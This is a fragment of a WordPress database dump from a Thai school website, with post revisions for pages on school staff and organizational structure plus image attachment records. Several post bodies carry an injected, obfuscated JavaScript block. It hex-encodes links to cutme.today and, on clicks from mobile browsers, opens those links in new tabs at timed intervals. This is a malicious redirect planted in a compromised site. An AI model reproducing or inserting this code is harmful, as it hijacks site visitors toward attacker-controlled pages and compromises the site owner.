_0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','ITA ONLINE 2025','','inherit','closed','closed','','871-revision-v1','','','2025-07-02 10:40:32','2025-07-02 03:40:32','',871,'http://pakhaeng.ssk.in.th/?p=1599',0,'revision','',0),
(1600,1,'2025-07-02 10:46:14','2025-07-02 03:46:14','','Green Clean Corporate Organizational Chart','','inherit','','closed','','green-clean-corporate-organizational-chart','','','2025-07-02 10:46:14','2025-07-02 03:46:14','',605,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Green-Clean-Corporate-Organizational-Chart.png',0,'attachment','image/png',0),
(1601,1,'2025-07-02 10:46:19','2025-07-02 03:46:19','<!-- wp:shortcode -->\n[tmm name=\"%e0%b8%9a%e0%b8%b8%e0%b8%84%e0%b8%a5%e0%b8%b2%e0%b8%81%e0%b8%a3%e0%b9%83%e0%b8%99%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:image {\"id\":1600,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Green-Clean-Corporate-Organizational-Chart.png\" alt=\"\" class=\"wp-image-1600\"/></figure>\n<!-- /wp:image -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','คณะครู และบุคลากรทางการศึกษา','','inherit','closed','closed','','605-revision-v1','','','2025-07-02 10:46:19','2025-07-02 03:46:19','',605,'http://pakhaeng.ssk.in.th/?p=1601',0,'revision','',0),
(1602,1,'2025-07-02 10:47:16','2025-07-02 03:47:16','','Green Clean Corporate Organizational Chart','','inherit','','closed','','green-clean-corporate-organizational-chart-2','','','2025-07-02 10:47:16','2025-07-02 03:47:16','',546,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Green-Clean-Corporate-Organizational-Chart-1.png',0,'attachment','image/png',0),
(1603,1,'2025-07-02 10:47:22','2025-07-02 03:47:22','<!-- wp:image {\"id\":1280,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้าง-1-1024x256.png\" alt=\"\" class=\"wp-image-1280\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:file {\"id\":1284,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"โครงสร้างและอำนาจหน้าที่\"></object><a id=\"wp-block-file--media-18759cf2-e68c-45aa-8b1a-07e5eddca924\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\">โครงสร้างและอำนาจหน้าที่</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/05/โครงสร้างและอำนาจหน้าที่.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-18759cf2-e68c-45aa-8b1a-07e5eddca924\">Download</a></div>\n<!-- /wp:file -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":1602,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Green-Clean-Corporate-Organizational-Chart-1.png\" alt=\"\" class=\"wp-image-1602\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','โครงสร้างและอำนาจหน้าที่','','inherit','closed','closed','','546-revision-v1','','','2025-07-02 10:47:22','2025-07-02 03:47:22','',546,'http://pakhaeng.ssk.in.th/?p=1603',0,'revision','',0),
(1604,1,'2025-07-02 10:53:12','2025-07-02 03:53:12','','5','','inherit','','closed','','5-3','','','2025-07-02 10:53:12','2025-07-02 03:53:12','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png',0,'attachment','image/png',0),
(1606,1,'2025-07-02 10:53:52','2025-07-02 03:53:52','','6','','inherit','','closed','','6-2','','','2025-07-02 10:53:52','2025-07-02 03:53:52','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png',0,'attachment','image/png',0),
